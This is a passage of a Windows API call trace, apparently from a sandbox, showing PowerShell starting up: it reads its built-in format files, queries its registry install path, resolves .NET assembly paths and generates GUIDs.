lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.152] SetErrorMode (uMode=0x1) returned 0x1 [0085.152] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c [0085.152] GetFileType (hFile=0x30c) returned 0x1 [0085.152] SetErrorMode (uMode=0x1) returned 0x1 [0085.152] GetFileType (hFile=0x30c) returned 0x1 [0085.152] ReadFile (in: hFile=0x30c, lpBuffer=0x31e2b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e2b58*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.160] ReadFile (in: hFile=0x30c, lpBuffer=0x31e2b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e2b58*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.160] ReadFile (in: hFile=0x30c, lpBuffer=0x31e2b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e2b58*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.160] ReadFile (in: hFile=0x30c, lpBuffer=0x31e2b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e2b58*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.161] ReadFile (in: hFile=0x30c, lpBuffer=0x31e2b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e2b58*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.161] ReadFile (in: hFile=0x30c, lpBuffer=0x31e2b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e2b58*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.161] ReadFile (in: hFile=0x30c, lpBuffer=0x31e2b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e2b58*, lpNumberOfBytesRead=0xed078*=0xaca, lpOverlapped=0x0) returned 1 [0085.161] ReadFile (in: hFile=0x30c, lpBuffer=0x31e218a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e218a*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0085.161] ReadFile (in: hFile=0x30c, lpBuffer=0x31e2b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x31e2b58*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0085.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.162] SetErrorMode (uMode=0x1) returned 0x1 [0085.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0085.162] SetErrorMode (uMode=0x1) returned 0x1 [0085.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.162] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed108 | out: phkResult=0xed108*=0x30c) returned 0x0 [0085.162] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed08c, lpData=0x0, lpcbData=0xed088*=0x0 | out: lpType=0xed08c*=0x1, lpData=0x0, lpcbData=0xed088*=0x56) returned 0x0 [0085.162] CoTaskMemAlloc (cb=0x5a) returned 0x1c6d10 [0085.162] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed05c, lpData=0x1c6d10, lpcbData=0xed058*=0x56 | out: lpType=0xed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed058*=0x56) returned 0x0 [0085.162] RegCloseKey (hKey=0x30c) returned 0x0 [0085.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0085.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0085.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0085.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0085.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0085.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0085.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0085.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0085.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0085.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0085.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0085.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0085.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0085.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0085.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0085.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0085.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0085.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.270] VirtualQuery (in: lpAddress=0xebba0, lpBuffer=0xeca60, dwLength=0x30 | out: lpBuffer=0xeca60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.271] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x5df98b22, Data2=0x6c58, Data3=0x4aac, Data4=([0]=0xbb, [1]=0xc2, [2]=0x3d, [3]=0x44, [4]=0x4c, [5]=0x48, [6]=0x56, [7]=0x60))) returned 0x0 [0085.272] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x481ef7f4, Data2=0x5e86, Data3=0x4a64, Data4=([0]=0x9c, [1]=0xae, [2]=0x79, [3]=0xf3, [4]=0x40, [5]=0x35, [6]=0xd6, [7]=0x96))) returned 0x0 [0085.273] VirtualQuery (in: lpAddress=0xebd50, lpBuffer=0xecc10, dwLength=0x30 | out: lpBuffer=0xecc10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.274] VirtualQuery (in: lpAddress=0xebd50, lpBuffer=0xecc10, dwLength=0x30 | out: lpBuffer=0xecc10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.275] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xbef16cf3, Data2=0xac6a, Data3=0x4a93, Data4=([0]=0xab, [1]=0x7, [2]=0xc3, [3]=0x42, [4]=0xd4, [5]=0x14, [6]=0x1f, [7]=0x7d))) returned 0x0 [0085.279] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x805ed347, Data2=0xe0fe, Data3=0x4d78, Data4=([0]=0xb4, [1]=0xe3, [2]=0xd, [3]=0xce, [4]=0x1d, [5]=0x42, [6]=0x3e, [7]=0xae))) returned 0x0 [0085.279] VirtualQuery (in: lpAddress=0xebfa0, lpBuffer=0xece60, dwLength=0x30 | out: lpBuffer=0xece60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.280] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.280] VirtualQuery (in: lpAddress=0xebce0, lpBuffer=0xecba0, dwLength=0x30 | out: lpBuffer=0xecba0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.281] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x1b6f85ba, Data2=0x913f, Data3=0x4dc9, Data4=([0]=0x8a, [1]=0x3d, [2]=0x91, [3]=0xec, [4]=0x4a, [5]=0xa3, [6]=0xe7, [7]=0x8f))) returned 0x0 [0085.281] VirtualQuery (in: lpAddress=0xebfa0, lpBuffer=0xece60, dwLength=0x30 | out: lpBuffer=0xece60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.281] VirtualQuery (in: lpAddress=0xebdc0, lpBuffer=0xecc80, dwLength=0x30 | out: lpBuffer=0xecc80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.282] VirtualQuery (in: lpAddress=0xeb610, lpBuffer=0xec4d0, dwLength=0x30 | out: lpBuffer=0xec4d0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.282] VirtualQuery (in: lpAddress=0xeb610, lpBuffer=0xec4d0, dwLength=0x30 | out: lpBuffer=0xec4d0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.282] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x6d7e6db5, Data2=0x34dd, Data3=0x4873, Data4=([0]=0xb0, [1]=0x5, [2]=0x81, [3]=0x91, [4]=0xf7, [5]=0xdb, [6]=0xe2, [7]=0x65))) returned 0x0 [0085.283] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x75b2c53, Data2=0xd671, Data3=0x42fe, Data4=([0]=0xb3, [1]=0xbc, [2]=0xe3, [3]=0xa7, [4]=0x3b, [5]=0x9d, [6]=0xd9, [7]=0x37))) returned 0x0 [0085.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.283] SetErrorMode (uMode=0x1) returned 0x1 [0085.283] SetErrorMode (uMode=0x1) returned 0x1 [0085.284] GetFileType (hFile=0x30c) returned 0x1 [0085.284] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.287] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.288] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.288] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.288] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.289] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.289] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.289] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.290] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.290] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.290] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.290] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.290] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.291] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.291] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.291] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.292] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x1000, lpOverlapped=0x0) returned 1 [0085.292] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0xbce, lpOverlapped=0x0) returned 1 [0085.292] ReadFile (in: hFile=0x30c, lpBuffer=0x3294886, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3294886*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0085.292] ReadFile (in: hFile=0x30c, lpBuffer=0x3295150, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed078, lpOverlapped=0x0 | out: lpBuffer=0x3295150*, lpNumberOfBytesRead=0xed078*=0x0, lpOverlapped=0x0) returned 1 [0085.293] CloseHandle (hObject=0x30c) returned 1 [0085.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0085.293] SetErrorMode (uMode=0x1) returned 0x1 [0085.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed020 | out: lpFileInformation=0xed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0085.293] SetErrorMode (uMode=0x1) returned 0x1 [0085.293] GetFullPathNameW (in: 